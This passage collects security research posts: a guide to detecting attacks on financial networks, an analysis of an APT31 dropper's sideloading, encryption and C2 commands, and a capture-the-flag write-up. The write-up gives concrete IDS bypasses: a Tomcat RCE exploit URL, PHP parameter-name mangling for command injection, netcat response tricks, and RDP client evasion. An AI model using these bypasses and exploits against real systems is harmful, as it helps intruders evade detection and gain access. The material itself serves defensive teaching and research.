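    return flagged

# Six different accounts in six seconds from one IP vs. normal retries
events = [(i, "203.0.113.5", f"user{i}") for i in range(6)]
events += [(100, "10.0.0.7", "alice"), (101, "10.0.0.7", "alice")]
```

For events 4776 and 4771, where the source address is the perimeter host itself, the same windowed distinct-account count applies without the per-IP grouping.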

Persistence

When attackers are able to execute commands on the system, they need to gain persistence in order to maintain permanent access to the infrastructure. One of the most common ways to gain persistence on a host is to add a malicious executable file to the startup; 82% of APT groups use this technique. Let's look at how to detect it using event logs and, in some cases, network traffic.

In the Sysmon logs, you need to track the addition or modification of registry keys and their values using events 12 "RegistryEvent (Object create and delete)" and 13 "RegistryEvent (Value Set)" for certain registry branches associated with the startup function.

Figure 3. Example of the Add Values event

Registry Branches

         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

         HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

         HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

         HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

         HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

         HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

         HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

         HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

         HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

         HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

         HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows


Additionally, it is recommended to track Sysmon events with ID 11 "File Create" in the directory C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp and check files with the extensions .lnk, .vbs, .js, .cmd, .com, .bat, or .exe.
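That check amounts to matching the created file's directory and extension. A minimal sketch over the path from a hypothetical parsed Sysmon event 11 record, using the common startup directory and extension list from the text:

```python
import ntpath  # Windows-style path handling, works on any platform

STARTUP_DIRS = {
    r"c:\programdata\microsoft\windows\start menu\programs\startup",
}
RISKY_EXT = {".lnk", ".vbs", ".js", ".cmd", ".com", ".bat", ".exe"}

def flag_startup_drop(file_created_path: str) -> bool:
    """Flag a "File Create" record that drops an executable file type
    into the common startup directory."""
    directory, name = ntpath.split(file_created_path.lower())
    ext = ntpath.splitext(name)[1]
    return directory in STARTUP_DIRS and ext in RISKY_EXT
```

Per-user startup directories (under %APPDATA%) would need the same check with the user profile path expanded.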

The technique in question is not reflected in network traffic if the actions are performed locally on the host. However, it is possible to imagine a situation in which attackers perform manipulations remotely. For example, using WINREG (Windows Remote Registry Protocol) access to a remote registry, attackers add a value to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Also, if they have the appropriate access rights, they can copy the file over the SMB protocol. For example, when copying an executable file or a BAT file with command interpreter instructions to a folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp, the operating system will automatically launch such a file when any user logs in.

Collecting infrastructure data

The attackers need to understand where they are in the infrastructure, which hosts are of interest, and how to reach them. In our scenario, where the goal is money theft, computers with access to financial systems will be the attackers' points of interest. Therefore, criminals conduct reconnaissance: they check which hosts are available, obtain the address of the domain controller and a list of administrators, and find out what privileges they currently have and to which groups the user on whose behalf they execute commands belongs.

Search for system information

The application of the System Information Discovery technique can be detected using the security and PowerShell event logs in Windows, as well as using the Sysmon log. You need to detect the following events:

        Starting processes:

         net.exe or net1.exe with the config command

         wmic.exe with the os or qfe command (the win32_operatingsystem and win32_quickfixengineering WMI classes)

         systeminfo.exe

         ipconfig.exe

         netstat.exe

         arp.exe

         reg.exe

        Reading the \Software\Microsoft\Windows\CurrentVersion registry key

        Running PowerShell commands, including WMI queries that obtain information about the system

Analyzing access rights of user groups

A sign of the Permission Groups Discovery technique on a local host is the start of the net.exe or net1.exe process with the localgroup, group /domain, or group /dom command. In the security event log, process start events have ID 4688; in Sysmon, ID 1.

It is possible to identify the technique in network traffic by tracking the corresponding requests. Information about groups can be obtained via the LDAP and SAMR network protocols. In the case of LDAP, the searchRequest messages and their filter field are of primary interest for detection. A single request can list all the groups:

Figure 4. Listing user groups

The memberof keyword is often used to list the members of a particular group. For example, the following figure lists the members of the domain administrators group.

Figure 5. Listing members of the domain administrators group


Attack development on the internal network

To connect to different infrastructure hosts (servers and workstations), you need to know user passwords or password hashes, or have a corresponding Kerberos ticket.

Kerberoasting attack

With the help of a Kerberoasting attack, an attacker can obtain the passwords of service accounts, which are often privileged. Any domain user can request a Kerberos ticket for access to a service, and such a request will be considered legitimate. The ticket is encrypted with a hash of the service account's password, so an attacker can try to recover the password offline by bruteforcing. This technique is also widely applied in penetration testing: it is successfully used in 61% of projects.

In the event logs, you need to detect anomalies in TGS ticket requests (event 4769 "A Kerberos service ticket was requested"): analyze all accounts and IP addresses from which a request to the service was made and check whether an account usually requests a TGS ticket to the analyzed service from the same IP address.

You also need to check the encryption algorithm in the requests: use of the RC4 algorithm is one of the signs of a Kerberoasting attack.
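The RC4 check can be expressed directly over parsed 4769 records. This sketch assumes hypothetical dictionaries with `account`, `service`, and `ticket_encryption_type` fields; Kerberos encryption type 0x17 is RC4-HMAC, whereas AES-encrypted tickets use types such as 0x12.

```python
RC4_HMAC = 0x17  # Kerberos etype for RC4-HMAC; AES256 is 0x12

def kerberoasting_suspects(events):
    """Return (account, service) pairs from 4769 records that requested
    a service ticket with RC4 encryption."""
    return [(e["account"], e["service"])
            for e in events
            if e["ticket_encryption_type"] == RC4_HMAC]

events = [
    {"account": "jdoe", "service": "MSSQLSvc/db01",
     "ticket_encryption_type": 0x17},
    {"account": "wks01$", "service": "cifs/fs01",
     "ticket_encryption_type": 0x12},
]
```

RC4 alone is not proof of an attack (legacy systems still use it), so the result should be combined with the account/IP anomaly check described above.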

In network traffic, you need to capture requests for listing services in Active Directory that can become targets for an attack. This stage is necessary for attackers to select a service to attack, and precedes the request for a TGS ticket and the bruteforcing of a password offline. You can list services, for example, using LDAP and the servicePrincipalName keyword in the filter field.

Figure 6. Listing services in Active Directory

 In this case, the enabled user accounts are requested.

SMB/Windows shared administrative resources

Shared administrative resources such as C$, ADMIN$, and IPC$ can be used by an attacker to remotely access the system. This technique is used both to transfer a file and to run a service on a remote computer. The method of detecting this technique using event logs and network traffic is contained in the full report (learn more).

Gaining control over the infrastructure

As a rule, a fraudulent operation does not require full control over the infrastructure. However, the maximum privileges allow attackers to move freely between computers, so it is likely that they will try to get the KRBTGT account. The privileges of this account allow them to create Kerberos tickets to access any resources with maximum privileges. Let's look at how to detect attempts to replicate credentials.

Detection using event logs

The DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, and DS-Replication-Get-Changes-In-Filtered-Set privileges are required to replicate credentials from a domain controller.

In the security event log on domain controllers, in events with the ID 4662 "An operation was performed on an object", you need to track these privileges, and to detect the source of the attack, you need to match these events with the event 4624 "An account was successfully logged on," which will have the same login ID.

Detection using network traffic

When run with the -just-dc-user flag, the secretsdump utility uses the DCSync technique to obtain domain credentials. In this attack, a host controlled by the attacker presents itself as a domain controller and requests replication of the credentials of specific users.

Domain controllers use the Directory Replication Service (DRS) Remote Protocol for replication, or more precisely, calls to the RPC interface that implements this protocol, DRSUAPI. This interface has the DRSGetNCChanges method, which triggers replication. If such calls come from a computer that is not a domain controller, this is a clear sign of a DCSync attack.

Figure 7. DCSync attack traffic (Wireshark) 
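The detection rule above reduces to checking the source of DRSGetNCChanges calls against the known domain controllers. A sketch over hypothetical parsed RPC-call records (the field names and the DC address list are assumptions for illustration):

```python
# Known domain controllers in this hypothetical network
DOMAIN_CONTROLLERS = {"10.0.0.10", "10.0.0.11"}

def dcsync_alerts(rpc_calls):
    """Flag DRSGetNCChanges calls whose source is not a known domain
    controller — the core sign of a DCSync attack."""
    return [c["src_ip"] for c in rpc_calls
            if c["interface"] == "drsuapi"
            and c["operation"] == "DRSGetNCChanges"
            and c["src_ip"] not in DOMAIN_CONTROLLERS]

calls = [
    {"interface": "drsuapi", "operation": "DRSGetNCChanges",
     "src_ip": "10.0.0.50"},  # workstation pretending to be a DC
    {"interface": "drsuapi", "operation": "DRSGetNCChanges",
     "src_ip": "10.0.0.11"},  # legitimate DC-to-DC replication
]
```

Keeping the DC list current is the hard part in practice; stale lists produce false positives when new controllers are promoted.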

Access to financial systems 

Having obtained the KRBTGT account in the previous step, an attacker can forge a Kerberos ticket granting access to any domain resource with maximum privileges, including the computers that work with financial systems, such as an accountant's workstation. This is known as a Golden Ticket attack.

You need to look for anomalies in the DOMAIN ACCOUNT field in events with the following IDs:

        4624 "An account was successfully logged on"

        4634 "An account was logged off"

        4672 "Special privileges assigned to new logon"

Some utilities used for the Golden Ticket attack may fill this field incorrectly: it may be empty or differ from the domain name. You should also check the ticket encryption type: use of RC4 may be a sign of an attack. In addition, a Golden Ticket attack produces no TGT request events (event ID 4768) from the user's computer.
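The domain-field anomaly check is straightforward once the logon events are parsed. A sketch, assuming a hypothetical `target_domain` field and an example NetBIOS domain name `CORP` (both illustrative):

```python
EXPECTED_DOMAIN = "CORP"  # assumed NetBIOS domain name of the environment

def golden_ticket_suspect(logon_event: dict) -> bool:
    """Flag 4624/4672 records whose domain field is empty or does not
    match the real domain — a common artifact of forged tickets."""
    domain = logon_event.get("target_domain", "")
    return domain.upper() != EXPECTED_DOMAIN

# An empty domain field is suspicious; the real domain name is not
suspicious = golden_ticket_suspect({"target_domain": ""})
```

This check catches only sloppy forgeries; correlating 4624 logons with the absence of a preceding 4768 TGT request is the stronger signal.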

In a legitimate Kerberos scenario, the user must obtain a TGT during initial authentication. To do this, the user sends an AS-REQ request to the domain controller, which returns the TGT in the body of the AS-REP response. The user can then request access to domain services. Authentication to a service requires a TGS ticket. To obtain it, the user sends the domain controller a TGS-REQ request containing their TGT. The server replies with a TGS-REP response containing the requested TGS ticket.

Figure 8. Legitimate request order in the traffic 

Since the Golden Ticket attack involves creating a TGT ticket outside the domain controller, the AS-REQ/AS-REP steps will be omitted from the traffic, meaning a ticket that was not issued will be used. Therefore, the purpose of traffic analysis is to detect the use of tickets that were not issued by the domain controller.

The final stage — money theft

There are special banking trojans that can automatically spoof payment details. In recent years, the RTM trojan has been widely used in attacks. Alternatively, an attacker can perform a fraudulent operation manually, tracking the workflow and actions of company employees. For this purpose, they install remote management malware on computers.

Use of remote management software 

Attackers can use various remote desktop access tools, including VNC technology: TightVNC, UltraVNC, RealVNC, and VNC Connect. The darknet sells modified versions of these programs that work unnoticed by the user. They allow attackers to spy on users, take screenshots, record videos, and intercept keyboard input. After collecting a sufficient amount of information, an attacker can connect to a computer and independently make a payment or spoof payment details.

The principle of operation of all products using VNC is very similar, so let's consider the behavior of TightVNC, since its source code is available. Let's look at how you can detect malicious activity for various remote control functions.


Use of banking trojans

Often, the purpose of banking trojans is to gain remote access to an e-banking or payment system. Therefore, they usually rely on common credential-stealing methods such as intercepting keystrokes, taking screenshots, reading the clipboard, or injecting code into browsers. But there are also techniques specific to this type of trojan.

Spoofing of bank details in the clipboard

The method consists in monitoring the clipboard for payment details and replacing them with the attacker's details. The Buhtrap ClipBanker trojan checks the clipboard contents for electronic or cryptocurrency wallet addresses and, if any are found, spoofs them. This malware's list includes more than 30 wallet types. You can detect this behavior in a sandbox by copying fake wallet addresses of the most common payment systems to the clipboard and then monitoring the clipboard contents.
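The sandbox check boils down to planting a known address and seeing whether the clipboard later holds a different one. A sketch with an intentionally loose Bitcoin-address pattern (the regex and helper name are illustrative, not a production validator):

```python
import re

# Loose pattern for legacy Bitcoin addresses (illustrative, not exhaustive):
# starts with 1 or 3, Base58 alphabet, typical length range
BTC = re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$")

def clipboard_swapped(planted: str, observed: str) -> bool:
    """Sandbox check: we copy a known wallet address to the clipboard,
    then flag the sample if the clipboard now holds a *different*
    address of the same format."""
    return (BTC.match(planted) is not None
            and BTC.match(observed) is not None
            and planted != observed)

planted = "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"  # well-known example address
```

The same approach extends to other wallet formats by adding one pattern per payment system the sandbox plants.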

Spoofing of payment orders

In the CIS countries, the most widely used accounting system is 1C:Enterprise, which can send payments to the bank through e-banking systems. The file 1c_to_kl.txt is used for transmitting payment data to the e-banking system. Attackers can modify this file to transfer money to their own accounts; this is how the RTM trojan works, for example. The full research describes how to detect this malicious activity (read more).

Modification of e-banking system files

This technique is used to bypass the self-protection of e-banking systems. An example is the BlueNoroff trojan, which modifies the modules of the SWIFT Alliance banking software in memory to disable database verification and allow attackers to edit the database. The trojan uses the VirtualProtectEx function to make a code fragment writable, ReadProcessMemory to make sure it is changing the right fragment, and WriteProcessMemory to overwrite the desired bytes.

You can detect the modification of e-banking processes and files. Calling VirtualProtectEx with the PAGE_EXECUTE_READWRITE memory protection parameter on e-banking processes is extremely suspicious and, in combination with a WriteProcessMemory call, can serve as an indicator that e-banking processes have been tampered with.

Theft of keys from payment systems and wallets

Some trojans steal private keys from payment systems and wallets: for example, Buhtrap ClipBanker steals keys from Electrum and Bitcoin wallets. It searches for these keys using the paths %appdata%\eLectrUm*\wAllEts\ and %appdata%\BiTcOin\wAllEts\walLet.dAt.

Figure 9. Code fragment of the Buhtrap ClipBanker trojan

You can detect this behavior by accessing these paths. Usually, the file search is performed using the FindFirstFile and FindNextFile functions. In addition, you can track attempts to open files using CreateFileA by checking the paths to the files. In the sandbox, you can place dummy files in the appropriate paths, and then monitor access to them.

In the course of a campaign, attackers have to use many techniques. To identify the attack as a whole, it is not necessary to spot every single technique; it is enough to notice any one of its steps in time. Still, the earlier the attackers' actions are detected, the easier it is to prevent negative consequences.

You may find the whole text of the research here. Other Positive Technologies' studies are available in the Knowledge base on our website.

Author: Ekaterina Kilyusheva 


APT31 new dropper. Target destinations: Mongolia, Russia, the U.S., and elsewhere


Our specialists at the PT Expert Security Center regularly spot emerging information security threats and track the activity of hacker groups. During such monitoring in April 2021, we detected a phishing mailing with previously unknown malicious content sent to Mongolia. Similar attacks were subsequently identified in Russia, Belarus, Canada, and the United States. According to PT ESC threat intelligence analysts, approximately 10 attacks were carried out using the discovered malware samples from January to July 2021.

Some of the files found during the study had rather interesting names, such as "хавсралт.scr" ("havsralt.scr", Mongolian for "attachment") and "Информация_Рб_июнь_2021_года_2021062826109.exe", and, as the study showed, they contained a remote access trojan (RAT). A detailed analysis of the malware samples, the paths of working directories and registry keys, and the techniques and mechanisms used by the attackers (from malicious code injection to the logical blocks and structures used) helped us attribute this malware to the activity of the APT31 group.

In this article, we will examine the malware created by the group, focusing in more detail on the types of droppers discovered and the tricks used by their developers. You may find the whole text of the research, along with indicators of compromise that cybersecurity specialists can use to identify traces of the group's attacks and hunt for threats in their infrastructure, here.


Dropper

The main objective of the dropper, whose main function is shown in Figure 1, is to create two files on the infected computer: a malicious library and an application vulnerable to DLL sideloading (this application is then launched). Both files are always created in the same path: C:\ProgramData\Apacha. If this directory does not exist, it is created and the process is restarted.

Figure 1. Overview of the dropper's basic function


At the second stage, the application launched by the dropper loads the malicious library and calls one of its functions. Notably, MSVCR100.dll was chosen as the name of the malicious library in all cases. A library with the same name ships with Visual C++ for Microsoft Visual Studio and is present on almost all PCs, but the legitimate copy resides in the System32 folder (Figure 2). Moreover, the malicious library is much smaller than the legitimate one.


Figure 2. Parameters of the legitimate MSVCR100.dll


Also worth noting is a trick by the malware developers: the library exports names that can be found in the legitimate MSVCR100.dll. This was undoubtedly done to make the malicious library resemble the original as closely as possible.

Figure 3. Part of the exports of malicious MSVCR100.dll

However, the number of exports in the malicious sample is much smaller, and most of them are ExitProcess calls.

Below is an example of a call to a malicious function from the created library. After the call, control is transferred to the malicious code. Note that the names of malicious functions were most often those used during the regular loading of applications.

Figure 4. Calling a malicious function inside a legitimate application

During the analysis of malware samples, we detected different versions of droppers that contain the same set of functions. The main difference is the name of the directory in which the files contained in the dropper will be created. However, in all the instances studied, the directories found in C:\ProgramData\ were used.

The version of the dropper that downloads all files from the control server is worthy of particular note. Let's take a closer look. At the first stage, the presence of a working directory is also checked, after which connection is made to the control server and the necessary data is downloaded from it.

Figure 5. Checking for a directory

Communication with the server is not encrypted in any way, nor is the control server's address inside the malware. Downloaded files are written to the created working directory.

Figure 6. Creating files in the working directory

Figure 7 displays the code sections responsible for downloading all files from the server (the last reviewed case), while Figure 8 displays the code for loading the main library (first instance).

Figure 7. Downloading files from C2

 

Figure 8. Downloading a malicious library from C2

Examining the open directories of control servers revealed unencrypted libraries (Figure 9).

Figure 9. Encrypted and unencrypted libraries on the server

It is also worth noting that in some cases, particularly during attacks on Mongolia, the dropper was signed with a valid digital signature (Figure 10). We believe that this signature was most likely stolen.

Figure 10. Valid digital signature of a dropper


Malicious library

Execution begins by obtaining a list of running processes; however, this result has no effect on anything and is not used anywhere. The library then checks for the presence of the file C:\ProgramData\Apacha\ssvagent.dll. This is the encrypted main payload downloaded from the server.

The encryption is a 5-byte XOR with a key built into the library. Inside the binary, the key is stored as an xmmword with the constant 9000000090000000900000009h (the fifth byte is written to memory by the malware itself at a direct address). In effect, every byte is XORed with 0x09. After decrypting the C2 address, the library connects to the control server and downloads the encrypted payload. The received data is saved to the file C:\ProgramData\Apacha\ssvagent.dll, and the legitimate application ssvagent.exe is restarted. The main part of the described functionality is shown in Figure 11.

Figure 11. Decrypting the C2 address, loading and launching a new instance of ssvagent.exe
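The decryption scheme is trivial to replicate for analysis. A minimal sketch of the 5-byte XOR; since every key byte in this sample is 0x09, the whole buffer is effectively XORed with a single byte (the sample string below is hypothetical):

```python
def xor_decrypt(data: bytes, key: bytes = b"\x09" * 5) -> bytes:
    """Replicate the dropper's rolling 5-byte XOR. With this sample's
    key (all bytes 0x09), it degenerates to XOR with 0x09."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# XOR is its own inverse: "encrypting" a hypothetical C2 string and
# decrypting it again recovers the original
blob = xor_decrypt(b"http://example.com/c2")
```

The same routine, pointed at the downloaded ssvagent.dll blob, yields the plaintext payload for further analysis.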

If the payload has already been loaded, the library checks whether an instance of the application is already running. To do this, it creates a mutex named ssvagent; if the mutex already exists, the application exits.

The library then writes the legitimate ssvagent.exe to startup via the registry, as shown in Figure 12.

Figure 12. Persistence via registry key


After this, the file downloaded from the server is decrypted using a XOR operation with a 5-byte key. Then the decrypted data is placed in the application memory, and control is transferred to it.

Payload

The main library starts its execution by creating a package to be sent to the server. Structurally, the package consists of three parts:

  1. main header
  2. hash
  3. encrypted data

The research describes their structures (learn more).

To generate the hash, which follows the main header, the malware obtains the MAC address and PC name (the result of calling GetComputerNameExW). These values are concatenated (without any separator), an MD5 hash is computed from the result, and the hash is converted into a string. An example of hash generation is presented in Figure 13.

Figure 13. Example of hash generation
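The victim-ID scheme can be reproduced for building network signatures. A sketch under stated assumptions: the exact MAC string format and the byte encoding of the concatenated value (ASCII here) are illustrative, since the text does not specify them.

```python
import hashlib

def victim_id(mac: str, computer_name: str) -> str:
    """Concatenate MAC address and computer name with no separator,
    MD5 the result, and render it as a hex string (as the payload does).
    Encoding of the concatenated value is assumed to be ASCII."""
    return hashlib.md5((mac + computer_name).encode("ascii")).hexdigest()

h = victim_id("00-0C-29-AA-BB-CC", "DESKTOP-TEST")
```

The ID is stable across reboots of the same machine, which is presumably why the malware derives it from hardware and host identity rather than generating a random value.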

The third part of the package is then formed.

Figure 14. An example of a generated package

The format of a complete generated package is presented below. The main header is highlighted in green; the hash, in red; the encrypted data, in yellow.

Figure 15. Encrypted package with all headers

Figure 16. Decrypting data from a specific position within a binary file

The generated package is encrypted with RC4 using the key 0x16CCA81F, which is embedded in the encrypted data, and is sent to the server. After that, the malware waits for commands from the server.
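RC4 with a 4-byte key is straightforward to model; the byte order in which the malware expands 0x16CCA81F into key bytes is an assumption here:

```python
def rc4(key: bytes, data: bytes) -> bytes:
    # Key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA)
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

key = (0x16CCA81F).to_bytes(4, "little")  # byte order is an assumption
packet = rc4(key, b"example package")     # encryption; decryption is identical
```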

Let's take a look at the commands the malware implements:

  • 0x3: get information on mapped drives.
  • 0x4: perform a file search.
  • 0x5: create a process, communicating with it through a pipe.
  • 0xA: create a process via ShellExecute.
  • 0xC: create a new thread that downloads a file from the server.
  • 0x6, 0x7, 0x8, 0x9 (identical): find a file and perform the requested operation via SHFileOperationW (copy, move, rename, or delete the file).
  • 0xB: create a directory.
  • 0xD: create a new thread that sends a file to the server.
  • 0x11: self-delete.
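The command loop can be pictured as a simple dispatch table; the handler labels below are descriptive placeholders, not symbols recovered from the binary:

```python
# Descriptive placeholders for the handlers behind each command ID
HANDLERS = {
    0x3: "get_mapped_drives",
    0x4: "search_files",
    0x5: "create_process_with_pipe",
    0x6: "file_operation",  # 0x6-0x9 share one SHFileOperationW-based handler
    0x7: "file_operation",
    0x8: "file_operation",
    0x9: "file_operation",
    0xA: "create_process_shellexecute",
    0xB: "create_directory",
    0xC: "download_file_in_new_thread",
    0xD: "upload_file_in_new_thread",
    0x11: "self_delete",
}

def dispatch(cmd: int) -> str:
    # Unrecognized command IDs fall through to a no-op
    return HANDLERS.get(cmd, "unknown")
```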

The code for processing the last command is particularly interesting: all the files and registry keys that were created are deleted using a bat file.

Figure 17. Code for removing all components

A more detailed description of the payload is available in the full report.

Attribution

During our study, we found a Secureworks report describing the APT31 DropboxAES RAT trojan. Analysis of the detected malware instances allows us to assert that the same group is behind the attack we studied. The criteria on which this attribution is based are detailed in the report (read more).

Conclusion

We analyzed new versions of the malware that APT31 used in attacks from January to July of this year. The similarities with earlier samples described by other researchers, for example in 2020, suggest that the group is expanding the geography of its interests to countries where its growing activity can be detected, Russia in particular. We expect that further instances of this group's tools being used in attacks, including against Russia, will come to light soon, along with other tools identifiable by code overlap or shared network infrastructure.

Follow the link to read the full report and get indicators of compromise. You can see more PT ESC reports on current cyber threats, new malware samples, activity of APT groups, hacker techniques and tools in the blog on our website.

Authors: Denis Kuvshinov, Daniil Koloskov, PT ESC Threat Intelligence, Positive Technologies 

 

PHDays 10 IDS Bypass contest: writeup and solutions


For the second time, the IDS Bypass contest was held at the Positive Hack Days conference. Just like last time (see blog.ptsecurity.com/2019/07/ids-bypass-contest-at-phdays-writeup.html), players had not only to find flaws in the six services and capture the flags, but also to bypass the IDS that stood in their way. Alert messages about triggered IDS rules were meant to help players find the bypasses. And as the previous competition showed, tasks can have an almost unlimited number of solutions. Here we go.


192.168.30.10—Apache Tomcat

On port 8080, we can see Apache Tomcat version 9.0.17. The first search for an exploit for this version should lead to CVE-2019-0232.

This task was intended as an introductory one and was supposed to be the simplest (although some of the other tasks turned out to be simpler). In the exploit, we see a test URL with the command /cgi/test.bat?&dir. But such a request simply hangs, and the player sees the IDS alert:

ATTACK [PTsecurity] Apache Tomcat RCE on Windows (CVE-2019-0232)

The idea was for players to modify the URL the same way they would to bypass a WAF. The regular expression in the rule looks like this: pcre: "/\.(?:bat|cmd)\?\&/U"; and it does not hold out against a player for long. In addition, some exploits already include an example of a bypass URL, for example: http://localhost:8080/cgi/test.bat%20%20?&dir. As a result, many players completed the task with ease. With the warm-up done, let's move on.
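The bypass is easy to verify against the rule's PCRE directly (rewritten here as a Python regex):

```python
import re

# The crucial PCRE from the IDS rule
rule = re.compile(r"\.(?:bat|cmd)\?&")

assert rule.search("/cgi/test.bat?&dir")            # plain exploit URL: alert fires
assert not rule.search("/cgi/test.bat%20%20?&dir")  # padded URL: no match, no alert
```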


192.168.30.20—PHP Bypass

On the main page, we can see an offer to test the ls command. It warns us that it may not be working.

And, as expected, it is not working. There is a message in the log:

ATTACK [PTsecurity] file_name parameter possible command injection

You might think the task is to exploit the RCE and get the flag, but the idea was different. In the summer of 2019, an author under the pseudonym "@Menin_TheMiddle" published an article (secjuice.com/abusing-php-query-string-parser-bypass-ids-ips-waf) about bypassing IDS and WAF. It pointed out that the PHP interpreter converts a number of characters in GET parameter names to an underscore ("_"). Our IDS, unlike PHP, does not do this. As an example, the author used one of the public IDS rules of our AttackDetection team. Since the crucial part of the Suricata rule looked like this: pcre: "/file_name\s*=\s*[a-zA-Z\.]*[^a-zA-Z\.]/U"; it could be bypassed simply by replacing the file_name parameter with, say, file[name. Moreover, due to an error in the Suricata rule, you could get the flag simply by sending file_name=.
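Both bypasses can be checked against the rule's PCRE (rewritten as a Python regex; the $(id) payload is just an illustrative value):

```python
import re

# The crucial PCRE from the Suricata rule
rule = re.compile(r"file_name\s*=\s*[a-zA-Z.]*[^a-zA-Z.]")

assert rule.search("file_name=$(id)")      # straightforward attempt: caught
assert not rule.search("file[name=$(id)")  # PHP still parses this name as file_name
assert not rule.search("file_name=")       # the rule's own bug: empty value slips by
```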


192.168.30.30—He said yes

We see a form and instructions on how to get the flag. It is enough to give a simple answer "yes" to the HTTP request.


The players started a web server on their nodes, answered "yes" to incoming requests and saw the following line in the logs:

JOKE [PTsecurity] Sometimes Positive Technologies hurts! No 'yes' allowed

The rule checked all HTTP responses and blocked any that contained the string "yes". The game host accepted the "yes" answer in lowercase only. This task received the largest number of different solutions!

The intended solution was to redirect the incoming HTTP request to HTTPS and answer "yes" in the new request. To enable this vector, the checker deliberately used the allow_redirects=True and verify=False parameters of the requests library. The solution looked like this:

echo -ne "HTTP/1.1 302 Redirect\r\nLocation: https://10.8.0.2/hi_there\r\nContent-Length: 0\r\n\r\n" | sudo nc -nkvlp 80

echo -ne "HTTP/1.1 200 OK\r\nContent-Length: 3\r\nContent-Type: text/html\r\n\r\nyes" | sudo ncat -nvklp 443 --ssl

The player @vos wrapped the HTTP response in a hundred nested layers of gzip compression, and the player @webr0ck padded the response with almost 2 megabytes of zero bytes before the "yes" string. In both cases, Suricata turned out to be powerless.
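The nesting trick is easy to reproduce offline; each extra layer adds work the IDS must do before it can inspect the body (the HTTP framing with repeated Content-Encoding values is omitted here):

```python
import gzip

body = b"yes"
for _ in range(100):        # 100 layers of gzip around a 3-byte body
    body = gzip.compress(body)

# A client that keeps decompressing recovers the string; an IDS with a
# bounded decompression depth gives up long before layer 100
data = body
for _ in range(100):
    data = gzip.decompress(data)
```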

192.168.30.40—DCERPC

This was the highest-value task in the competition. The players were given administrator account credentials and asked to show their knowledge of Windows protocols. To get the flag, they had to extract the list of all users on the device.


Those familiar with AD security will immediately think of the samrdump.py script from the impacket suite, but that script talks to SMB port 445, which is closed on the host. The binding string in the script, ncacn_np:*hostname*[\pipe\samr], is hardcoded and leads to an SMB pipe. Moreover, only port 135 is open on the host; the so-called Endpoint Mapper (EPM), which is responsible for resolving RPC interfaces, listens on it.

Another script from the impacket suite, rpcdump.py, uses EPM to obtain the list of currently active RPC interfaces.

> python rpcdump.py Administrator:TastesG00d@192.168.30.40

Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol

Provider: samsrv.dll

UUID    : 12345778-1234-ABCD-EF00-0123456789AC v1.0

Bindings:

          ncacn_ip_tcp:192.168.30.40[49668]

          ncacn_np:\\TASK4[\pipe\lsass]

Among all the interfaces, we can see the one we need, SAMR, which is responsible, among other things, for user management. It is the SAMR interface that samrdump.py uses to extract the list of users. That means that, in addition to the SMB pipe, we can connect directly to port 49668 and request the user list over the DCERPC protocol. To do this, we need to patch samrdump.py so that it addresses the SAMR interface directly instead of going through the pipe. The players @vos and @Abr1k0s opted for a different solution: they used the ready-made walksam tool from the rpctools set, the only subtlety being the use of the RPC_C_AUTHN_LEVEL_PKT_PRIVACY flag instead of RPC_C_AUTHN_LEVEL_CALL. Alternative methods were to use the atsvc, svcctl, dcom, and other interfaces; all of them allow arbitrary code execution and are covered by IDS rules. The shutdown interface was also covered. The most unusual way to solve this task involved remotely searching for user-creation events with wevtutil.


192.168.30.50—RDP me

The task is simple: connect via RDP with a known account and read the flag from the desktop. The difficulty is that most well-known RDP clients are blocked by IDS rules. Every now and then, the players received one of the following messages:

  • TOOLS [PTsecurity] xfreerdp/vinagre/remmina RDP client
  • TOOLS [PTsecurity] xfreerdp/remmina RDP client
  • TOOLS [PTsecurity] MSTSC Win10 RDP client
  • TOOLS [PTsecurity] MSTSC Win7 RDP client
  • TOOLS [PTsecurity] Rdesktop RDP client

Sometimes different RDP clients behave the same way: for example, many Linux clients are built around the same library. The task has several solutions.

The first, originally intended one is the head-on solution. The player goes through different launch options or tries different clients and sees different IDS alerts. After analyzing the traffic, it becomes clear which packet the IDS blocks, and from this the player can infer how the rules work. The rules trigger on certain channel sequences (channelDef) in the ClientNetworkData field and on the order of the headers themselves.


Going through the launch options of recent versions of the xfreerdp client, the player may come across the echo option:

xfreerdp /v:192.168.30.50 /u:user /p:letmein +echo

xfreerdp with exactly these parameters slips past the IDS rules.

